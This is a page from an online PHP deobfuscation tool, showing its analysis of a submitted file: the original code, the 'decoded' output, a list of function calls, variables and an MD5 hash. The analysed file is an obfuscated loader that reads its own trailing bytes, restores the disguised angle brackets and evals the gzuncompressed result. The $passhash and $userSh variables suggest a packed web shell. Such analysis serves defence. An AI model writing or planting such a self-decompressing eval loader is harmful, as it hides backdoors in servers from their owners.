Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $passhash = ''; $userSh = 'unknown'; $d = substr(file_get_contents( __FILE__ ), -..

Decoded Output download

<?php 
$passhash = ''; 
$userSh = 'unknown'; 
$d = substr(file_get_contents( __FILE__ ), -184443); 
$d = str_replace('lxtvmwonzb', "<", $d); 
$d = str_replace('bduswayrto', ">", $d); 
$g = 'g'.'z'.'un'.'compr'.'e'.'ss'; 
eval($g($d)); 
exit; 
?> 
x&^gDD3P7q*.M{'2g,oh-)H4*1i_.~p??_eG?G=?#WS?c;l7_~ub:'Y/]}?gvoCEs?j?Ua\ufffd:%m_?~be?(4'Zk7?:~gTO3}%8gmJJK_'m_sVc1q2, 
._lxtvmwonzb)MGG^dS^#4_}J+4} 
y_qF DHoo	Vqk_kWr~kg\ufffdk 
'w2% 
_'PDoVgb{)f;.?_?EciP-Y,__GL

Did this file decode correctly?

Original Code

<?php
$passhash = '';
$userSh = 'unknown';
$d = substr(file_get_contents( __FILE__ ), -184443);
$d = str_replace('lxtvmwonzb', "<", $d);
$d = str_replace('bduswayrto', ">", $d);
$g = 'g'.'z'.'un'.'compr'.'e'.'ss';
eval($g($d));
exit;
?>
x&^gDD3P7q*.M{'2g,oh-)H4*1i_.~p??_eG?G=?#WS?c;l7_~ub:'Y/]}?gvoCEs?j?Ua\:%m_?~be?(4'Zk7?:~gTO3}%8gmJJK_'m_sVc1q2,
._lxtvmwonzb)MGG^dS^#4_}J+4}
y_qF DHoo	Vqk_kWr~kg\k
'w2%
_'PDoVgb{)f;.?_?EciP-Y,__GL

Function Calls

substr 1
str_replace 2
gzuncompress 1
file_get_contents 1

Variables

$d
$g gzuncompress
$userSh unknown
$passhash

Stats

MD5 737bbc402f5458120cd37f685f76a47f
Eval Count 0
Decode Time 197 ms